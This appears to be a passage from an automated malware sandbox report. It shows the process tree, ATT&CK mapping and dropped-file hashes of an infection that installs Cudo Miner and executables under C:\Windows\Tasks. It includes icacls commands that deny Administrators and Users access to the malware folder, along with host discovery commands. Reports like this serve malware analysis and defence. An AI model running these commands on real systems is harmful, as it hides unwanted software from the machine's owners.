C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4264

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2060

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1944

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4456

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1388

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1668

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1892

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1008

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4392

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1384

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1856

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2052

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3868

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3664

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4940

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1632

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:456

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4108

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3708

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3428

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4144

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3672

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2168

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:5004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1592

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3028

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1520

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1636

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:680

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1152

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3476

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:432

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1384

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3924

C:\windows\tasks\Wmiic.exe
C:\windows\tasks\Wmiic.exe
1⤵
- Executes dropped EXE
PID:924

C:\windows\tasks\IntelConfigService.exe
"IntelConfigService.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1268

C:\Windows\Tasks\MSTask.exe
C:\Windows\Tasks\MSTask.exe
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4236

C:\Windows\TEMP\~Mp5072.tmp\~Ma4650.exe
"C:\Windows\TEMP\~Mp5072.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4440

C:\Windows\Tasks\Superfetch.exe
C:\Windows\Tasks\Superfetch.exe
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
3⤵
PID:4484

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe cpu get /value
4⤵
PID:4028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
3⤵
PID:1524

C:\Windows\Tasks\Wrap.exe
C:\Windows\Tasks\Wrap.exe
3⤵
- Executes dropped EXE
PID:1596

C:\Windows\system32\fltMC.exe
fltmc
1⤵
PID:3028

C:\Windows\system32\chcp.com
chcp
1⤵
PID:3676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
1⤵
PID:4964

C:\Windows\Tasks\ApplicationsFrameHost.exe
C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1192

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:640

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "GBQHURCC$:(R,REA,RA,RD)"
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1640

C:\Windows\system32\ROUTE.EXE
C:\Windows\system32\route.exe print
1⤵
PID:1376

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe nic get MACAddress, name, NetEnabled, Speed, NetConnectionStatus, AdapterTypeId /value
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe nicconfig get dhcpEnabled /value
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\system32\ipconfig.exe
ipconfig /all
1⤵
- Gathers network information
PID:1592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start WMService
1⤵
PID:4220

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Winlogon Helper DLL

T1004

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cudo Miner\Cudo Miner Core.exe
Filesize
54.7MB

MD5
2fda1326f06edf41020ce8fef0d2df11

SHA1
55c47354050564bb44a39d6f14c79aa38b8ef329

SHA256
d9273b6c7ff52b23aacbf955e9bc61e0c22975908ea8a74ba33b92eeb4d794c3

SHA512
cad12df7bc7ffde6c7918bc33a3f3a1b75bfd2a54c8b812abe4b0891349323e7b33aa46d7532ee5743e0984b6aa8bbcb7be311b70474d8ab319f39ed275fb984

Download Submit
C:\Program Files\Cudo Miner\Cudo Miner.exe
Filesize
632KB

MD5
b3254b2bb44dd6dbed496f1c0b731884

SHA1
55c20c78a895a35e8dc7fd63f23c45ac3ba2d07c

SHA256
e4e3341ff4b22eb819acf3fe3a5c01e6dcee7e6e1304f1cac6408cdf72266a48

SHA512
18d8fc0a9206702aeb891b5e5f0e70500d69fde2cda39de3a4862c54d39e606d6238c20a5603550985cdcd48b15fd1cd80d8dc7e45f8ebee5abddc046fadd573

Download Submit
C:\Program Files\Cudo Miner\channel
Filesize
114B

MD5
75e634a042540a5f54d75f598b3d1246

SHA1
724124531a2ee7c5bf08904b11b5ec79a1b9f207

SHA256
c7f6fa5e350f8545a5c8b4f573b69627d263c664dbf40ac116e737c6f9257bb6

SHA512
10f569409f97c3844936188801ffbefb506bea95a7e60f343050fc6e1917c2f8448b4a906a77649d43d4f08073fa0b0822669b6a53fab97298bb86bc8ff2f43d

Download Submit
C:\Program Files\Cudo Miner\components
Filesize
64B

MD5
f8284093f38c0a087da1dfe7bfb6d8a9

SHA1
7a931ac4689c7996cebff8804506b2be76eb7b5f

SHA256
b5a982f917d00c8f9e75a11fede1958735dd20e4aeb3ba15bba4bcf11c796ac9

SHA512
2b4460d4b85779971d6b83fe0be5f3a7c9d094d0560c6f284f0c4a0818b66eafdd329306c09125a2f202751f7bbadd91cad4579320f77c210b5cf922e0452f5f

Download Submit
C:\Program files\Cudo Miner\.cudo_minerrc
Filesize
10B

MD5
9d2695de820cc6645398a2d783768af1

SHA1
e14f0e17abd0b9ea404bb18ad7e9ccf15c6039da

SHA256
8ee38f4c42ee36937faf6124a049ee553422822e06db4840c9c93c5a15b828b5

SHA512
eb2563246f68c7d1b3cacad3323331da5e47ce3c31abf6b4c7afbd34f07d8349c4ae111c330927822309db72661144ad3856c968fa45b491bafaad0263d514e2

Download Submit
C:\Program files\Cudo Miner\Cudo Miner Core.exe
Filesize
54.7MB

MD5
2fda1326f06edf41020ce8fef0d2df11

SHA1
55c47354050564bb44a39d6f14c79aa38b8ef329

SHA256
d9273b6c7ff52b23aacbf955e9bc61e0c22975908ea8a74ba33b92eeb4d794c3

SHA512
cad12df7bc7ffde6c7918bc33a3f3a1b75bfd2a54c8b812abe4b0891349323e7b33aa46d7532ee5743e0984b6aa8bbcb7be311b70474d8ab319f39ed275fb984

Download Submit
C:\Program files\Cudo Miner\Cudo Miner.exe
Filesize
632KB

MD5
b3254b2bb44dd6dbed496f1c0b731884

SHA1
55c20c78a895a35e8dc7fd63f23c45ac3ba2d07c

SHA256
e4e3341ff4b22eb819acf3fe3a5c01e6dcee7e6e1304f1cac6408cdf72266a48

SHA512
18d8fc0a9206702aeb891b5e5f0e70500d69fde2cda39de3a4862c54d39e606d6238c20a5603550985cdcd48b15fd1cd80d8dc7e45f8ebee5abddc046fadd573

Download Submit
C:\Program files\Cudo Miner\Cudo Miner.xml
Filesize
1KB

MD5
891e152c05c507bb9c8a786868dd1f9f

SHA1
b4df2aec8860652b83a4724bcee7f718d14706ba

SHA256
75f900d0012ee13293001db6cc0a0418a5f9cfb67517cc74a80cdf6695709458

SHA512
e503058a6a537ab6e94d6b2afca75e6b0e2ae8efa1f7830abcd4792dd708c9904f119f6278e894552935078996f72e82bc442d96b248eb8f98d780c41ce357f1

Download Submit
C:\Program files\Cudo Miner\run.bat
Filesize
332B

MD5
c770f2dddfc870f39356286934fe2b82

SHA1
a5639c014889d7129de1b3209f977cba61b26a73

SHA256
d06a274f6029e3ce205e04a2d46077143a58ac6fd711f769c81721551e3ec96a

SHA512
f238b2f460d8c4de90ec605548e628521b613c4a911255f3ed55d5d2428fd42d981aae0760d4c35e328bb1c03a01d2b31895c16c3cb086ebe3e42de7ee01e179

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\any.exe
Filesize
5.3MB

MD5
bcadcaf78a0cd119dababed7d094e79d

SHA1
c8c2207e554f2f79ddc1587c3fd40b4125ef1e18

SHA256
133ab0f053bdca0c356b4d78dc864a22189738358ff68233326ca571f3974904

SHA512
619bf833a0be0eb7585206437f210defc799590a97fa1732af2b36346a318aafba637efd4b7f2af8e575a047f51ef1f648ecfb2caa56eca8f42e6ab29deb90b2

Download Submit
C:\ProgramData\cudo.exe
Filesize
24.8MB

MD5
0ee363db6fa75ecc7bd90072eaa1e92c

SHA1
23e1be793ef81215d10dc88ae2af51a0e286358a

SHA256
bfc2c42dbd84cfde2443463d464d9778b3ac6e897668c9751ccdbe71c093700c

SHA512
533dd790f4a03f7b4d868fa6132fa0c1a97526954cc61c28cc473ae6ed91691b6c1cabfc708cd3e26aed93b79eaaaf3a20f5be944db77d773431a2b4a89b4e97

Download Submit
C:\ProgramData\curl.exe
Filesize
5.2MB

MD5
104023cef829fce3e34bf1514daff629

SHA1
b6e7b949109298ec7ff1aa64404a859b5b41ccae

SHA256
15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

SHA512
efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

Download Submit
C:\ProgramData\dc.exe
Filesize
937KB

MD5
77ff73f3e2469163b1a1d65414e564b9

SHA1
129c82bcacbd17cafe711f51b001f3e4ad704b4b

SHA256
058feeee219f1d24be76441645d391097ca7bee06d357ca35989fa3589fcf61e

SHA512
cd8d3efbccf3ea05f660a9a999d5996894b8ef282e7d67e36ef02699ce04f20f57eb530e13acca3488d96d14ddc5f80ab82a69137421d336a515d7ee567788f0

Download Submit
C:\ProgramData\migrate.exe
Filesize
6.6MB

MD5
f3ca9ed91fb9dfe95085e62bd9cd0a12

SHA1
8a438be4a1367a9e462718c8e0b66c8d2479fc16

SHA256
dc3c1bb67e793a42eb44cff30768751c743d1c1128263eca255c0ef3d5126708

SHA512
0cd76fcf2e4388bdfae6dc0f301f6a63eb3dc325674f6343f626797b40df8576859d35d45091cedf11d9c346e31807ffb525c3d92e9c9a597a05d2d1e35e6ea1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
0e3b2fb1305afa355fb0585c068cdbbd

SHA1
b4e9457bfdc38337f64e3b2606aa34861aa6b4ed

SHA256
43a303fed06d5928800280cb0bf716790d9f886c87f26faf9fbdfa59b55e9c0d

SHA512
6a754dbb33c549ace5f71e169511422284f688c9df1c1e5fac8a633feac24312ba39fa4c682bdc9fe1d1162e2a3bd6190013652e567909417579db4b8791554d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
a6392b8290674198792e7ac95f97d545

SHA1
7086cdfb0e9341767d7045699c6d0b4b2a1f10a5

SHA256
178f2c7e2a44ae4fd6ba23f9ed2036c94e14066fc8baf9e5affcbeca48e52da1

SHA512
06865bd7ef05d28eea1eba3f0c88b417cfecbf5163d6736dd7269117d83b20f13cfa9365d646b1ed33b3d3d73a62f6fa8b229e500aea8df2be957d46277f8c8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
cea49bd0493a393b32823736b2b189cf

SHA1
c19ca1293f78f745475f94642ffb1477c48769cb

SHA256
c053a662c68c41ec8ff5c167dc3a2243c1ba6e8e8f66daeeb808b1301d5fd049

SHA512
7f32253eca651d88a334ecbd75d06a5073470c3c4719c77b2bba6686f6b3516404cde1abc1d672ed29263ea9ab67e77eb19908065dee657ea78d93a93e7d8cf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
634f0c8d12eabcc0d39d3d426118e094

SHA1
9acfb4fabe9faea293bfa98eb6ed4d47bed75aec

SHA256
c346da5df3d07e5e8e050b1acbd946b9d703686f96a81b3e78dbfa0103ce0f60

SHA512
c9ce3f4609081b262edb9b15fcf8eefa95233c1196a20a13746094689e73422c77d0196447ba428b8256f685ec9037e4e980821bf44b9ebc5db1350a11204f3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
